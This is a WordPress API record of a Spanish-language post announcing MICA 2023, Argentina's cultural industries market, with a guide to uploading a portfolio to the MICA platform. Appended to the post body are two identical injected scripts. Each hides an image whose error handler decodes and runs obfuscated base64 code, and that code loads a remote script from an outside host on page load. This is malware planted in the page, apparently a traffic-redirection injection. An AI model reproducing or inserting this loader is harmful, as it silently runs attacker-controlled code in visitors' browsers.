{"id":2523,"date":"2023-04-17T14:02:28","date_gmt":"2023-04-17T17:02:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2523"},"modified":"2025-08-14T00:18:51","modified_gmt":"2025-08-14T03:18:51","slug":"se-viene-el-mica-2023-participa-carga-tu-portfolio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2523","title":{"rendered":"SE VIENE EL MICA 2023, PARTICIP\u00c1. CARG\u00c1 TU PORTFOLIO"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-black-background-color has-text-color has-background\"><em>Una nueva edici\u00f3n del Mercado de Industrias Culturales Argentinas (MICA) se presenta del 1 al 4 de Junio en el Centro Cultural Kirchner y su objetivo principal es conectar gestores\/as culturales, artistas, profesionales con empresarios, empresarias y productores\/as de todo el mundo.<\/em><\/h4>\n\n\n\n<p>El MICA re\u00fane desde el a\u00f1o 2011 un sin fin de pol\u00edticas p\u00fablicas que trabajan por el fortalecimiento de las industrias culturales argentinas. <em>\u201cDesde el MICA durante el a\u00f1o, desplegamos acciones en diversos puntos del pa\u00eds en busca de dar apoyo, participaci\u00f3n y la visibilidad que merecen nuestras industrias culturales. Creemos que su aporte es vital para el crecimiento econ\u00f3mico de nuestro pa\u00eds\u201d<\/em> explica <strong>Lucrecia Cardoso<\/strong>, secretaria de Desarrollo Cultural del Ministerio de Cultura de la Naci\u00f3n.<\/p>\n\n\n\n<p>Esta nueva edici\u00f3n contar\u00e1 con rondas de negocios con compradores\/as internacionales y nacionales,&nbsp; showcases, masterclass, talleres, charlas con aliados institucionales y comerciales para los sectores de artes visuales, audiovisual, circo, danzas, dise\u00f1o, editorial, folklore, gastronom\u00eda, hip hop, infancias, m\u00fasica, m\u00fasica acad\u00e9micas, tango, teatro y videojuegos. Adem\u00e1s se presentar\u00e1 el programa IncubAr y la Tienda MICA<\/p>\n\n\n\n<p>Brasil ser\u00e1 el pa\u00eds Invitado de Honor y se presentar\u00e1 con una importante comitiva de productores, artistas y compradores\/as de bienes y servicios culturales en busca de concretar acuerdos comerciales.<\/p>\n\n\n\n<p>Pero para participar, primero hay que anotarse a la plataforma MICA. La misma funcionar\u00e1 como un perfil para tu persona o actividad para que puedas acceder a diversas propuestas.&nbsp; A continuaci\u00f3n, te dejamos toda la informaci\u00f3n para que puedas participar de la pr\u00f3xima edici\u00f3n del Mercado de Industrias Culturales y potenciar&nbsp; tu proyecto art\u00edstico.<\/p>\n\n\n\n<p><strong>Portfolio: qu\u00e9 es y para qu\u00e9 sirve<\/strong><\/p>\n\n\n\n<p>Dentro de la plataforma MICA, el porfolio es la carta de presentaci\u00f3n de cada proyecto, aporta credibilidad, profesionalismo y permite a los compradores e inversores conocer cada detalle del mismo.&nbsp;<\/p>\n\n\n\n<p><strong>\u00bfPor qu\u00e9 tener un porfolio en la Plataforma MICA?<\/strong><\/p>\n\n\n\n<p>Cargar el portfolio te habilita a participar de la Comunidad MICA. A trav\u00e9s de la plataforma, se puede acceder a charlas y\/o capacitaciones e inscribirse a las rondas de negocios con compradores\/as nacionales e internacionales, que se realizar\u00e1n en el pr\u00f3ximo MICA, del 1 al 4 de junio en el Centro Cultural Kirchner.<\/p>\n\n\n\n<p><strong>Beneficios de tener tu porfolio MICA<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Participar de las rondas de negocios,<\/strong> es condici\u00f3n fundamental tener un porfolio cargado para poder participar.<\/li>\n\n\n\n<li><strong>Transmitir una imagen profesional <\/strong>para los compradores\/as que ver\u00e1n el material.<\/li>\n\n\n\n<li><strong>Despertar curiosidad en los compradores\/as <\/strong>y as\u00ed facilitar acuerdos comerciales entre s\u00ed.<\/li>\n\n\n\n<li><strong>Resumir la esencia de tu proyecto<\/strong> en un documento profesional.<\/li>\n\n\n\n<li><strong>Networking<\/strong> con colegas de todo el pa\u00eds. Podr\u00e1s conocer y conectar con proyectos similares.<\/li>\n<\/ul>\n\n\n\n<p><strong>Gu\u00eda para cargar tu portfolio<\/strong><\/p>\n\n\n\n<p>Te dejamos el paso a paso para que puedas cargar de manera exitosa tu portfolio y potenciar tu carrera profesional<\/p>\n\n\n\n<p><strong>1. REGISTRATE EN LA PLATAFORMA MICA<\/strong><strong><br><\/strong> Cre\u00e1 tu cuenta en<\/p>\n\n\n\n<p>&nbsp;<strong>2. COMPLET\u00c1 TU BIO<\/strong><strong><br><\/strong> La carta de presentaci\u00f3n<br>\u2022 Foto de perfil: logo o foto que represente tu proyecto.<\/p>\n\n\n\n<p>\u2022 Mini bio: cont\u00e1 de qu\u00e9 se trata tu actividad.<\/p>\n\n\n\n<p><strong>3. CARG\u00c1 TU PORTFOLIO<\/strong><\/p>\n\n\n\n<p>Orden\u00e1 tus trabajos por<strong> secciones<\/strong><\/p>\n\n\n\n<p>\u2022 Sub\u00ed una imagen de portada para cada secci\u00f3n.<br>\u2022 Agreg\u00e1 titulares concretos para cada secci\u00f3n.<br>\u2022 Utiliz\u00e1 etiquetas.<\/p>\n\n\n\n<p><strong>4. CRE\u00c1 TU CAT\u00c1LOGO<\/strong><\/p>\n\n\n\n<p>La vidriera de tus productos y servicios<\/p>\n\n\n\n<p>\u2022 A\u00f1ad\u00ed im\u00e1genes de tu\/s producto.<br>\u2022 Explic\u00e1 tus piezas.<br>\u2022 Aclar\u00e1 tus servicios.<\/p>\n\n\n\n<p><strong>5. FORM\u00c1 PARTE DE LA COMUNIDAD MICA<\/strong><\/p>\n\n\n\n<p>\u2022 Vinculate con colegas e inversores\/as.<br>\u2022 Consolid\u00e1 y dale visibilidad a&nbsp; tu proyecto.<br>\u2022 Vend\u00e9 y\/o cotiz\u00e1 tus productos o servicios.<br>\u2022 Acced\u00e9 a nuevas oportunidades de negocio.<br>\u2022 Capacitate y particip\u00e1 de rondas de negocios.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"2524\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-1024x576.png\" alt=\"\" class=\"wp-image-2524\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-1024x576.png 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-300x169.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-768x432.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-1536x864.png 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-696x391.png 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-1068x600.png 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo-747x420.png 747w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Rojo.png 1921w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"575\" data-id=\"2525\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-1024x575.png\" alt=\"\" class=\"wp-image-2525\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-1024x575.png 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-300x168.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-768x431.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-1536x863.png 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-696x391.png 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-1068x600.png 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-1920x1078.png 1920w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto-748x420.png 748w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/04\/MICA_Texto.png 1923w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00a1Sumate a MICA!<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Una nueva edici\u00f3n del Mercado de Industrias Culturales Argentinas (MICA) se presenta del 1 al 4 de Junio en el Centro Cultural Kirchner y su objetivo principal es conectar gestores\/as culturales, artistas, profesionales con empresarios, empresarias y productores\/as de todo el mundo. El MICA re\u00fane desde el a\u00f1o 2011 un sin fin de pol\u00edticas p\u00fablicas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2524,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2523","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2523"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2523"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2523\/revisions"}],"predecessor-version":[{"id":7112,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2523\/revisions\/7112"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2524"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2523"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2523"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2523"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}